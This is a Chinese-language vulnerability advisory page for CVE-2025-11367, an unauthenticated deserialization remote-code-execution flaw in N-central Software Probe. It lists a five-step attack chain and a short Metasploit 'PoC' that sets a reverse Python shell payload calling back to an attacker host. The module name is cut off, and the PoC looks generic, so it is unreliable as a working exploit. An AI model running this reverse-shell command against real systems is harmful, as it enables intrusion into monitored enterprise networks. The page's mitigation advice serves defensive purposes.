IPBUF安全漏洞报告
English
CVE-2025-11367 CVSS 9.8 严重

CVE-2025-11367 N-central Software Probe 反序列化远程代码执行漏洞

披露日期: 2025-11-12
来源: a5532a13-c4dd-4202-bef1-e0b8f2f8d12b

漏洞信息

漏洞编号
CVE-2025-11367
漏洞类型
远程代码执行
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
N-central Software Probe

相关标签

CVE-2025-11367反序列化漏洞远程代码执行N-central高危漏洞无需认证

漏洞概述

CVE-2025-11367是N-central Software Probe中的一个严重安全漏洞,CVSS评分高达9.8分(满分10分)。该漏洞存在于2025.4版本之前的软件探针中,攻击者可以通过构造恶意的序列化数据,在目标系统上执行任意代码。漏洞无需任何认证凭证即可被利用,且可通过网络远程触发,这使得它在野外极易被恶意利用。N-central作为一款广泛使用的监控和管理软件,其探针组件通常部署在企业网络的关键位置,一旦被攻破,攻击者可以获得对整个受监控基础设施的完全控制权。此漏洞的危险性在于其利用门槛极低,无需用户交互即可实现攻击,同时具备完整的机密性、完整性和可用性影响,能够完全 compromise 目标系统。

技术细节

该漏洞的根本原因在于N-central Software Probe对用户提供的序列化数据缺乏充分的验证和过滤。在正常的应用程序流程中,序列化技术用于将复杂对象转换为可存储或传输的格式,然后在需要时重新构建对象。然而,当应用程序直接反序列化来自不可信源的数据时,攻击者可以构造包含恶意负载的序列化对象。攻击者通常会利用Java反序列化漏洞中常见的gadget链,通过在序列化数据中嵌入恶意代码或命令,当应用程序执行反序列化操作时,这些恶意代码将被自动执行。在Metasploit框架中已存在针对此漏洞的利用模块,表明该漏洞的技术细节已被公开,攻击者可以轻易获取利用代码。由于该探针通常以高权限运行,攻击成功后可直接获得系统级权限。

攻击链分析

STEP 1
信息收集
识别运行N-central Software Probe的目标服务器
STEP 2
构造恶意序列化数据
创建包含RCE payload的序列化对象
STEP 3
发送 exploit
通过HTTP请求发送恶意数据到探针端点
STEP 4
触发反序列化
目标系统处理恶意序列化数据
STEP 5
执行代码
成功执行任意命令或代码

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
use exploit/multi/misc/java_serializ set RHOST <target_ip> set RPORT 8080 set PAYLOAD cmd/unix/reverse_python set LHOST <attacker_ip> exploit

影响范围

N-central Software Probe < 2025.4

防御指南

临时缓解措施
在无法立即升级的情况下,可通过网络分段和访问控制列表限制对探针端口的访问,同时启用详细的审计日志以检测潜在的攻击尝试。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表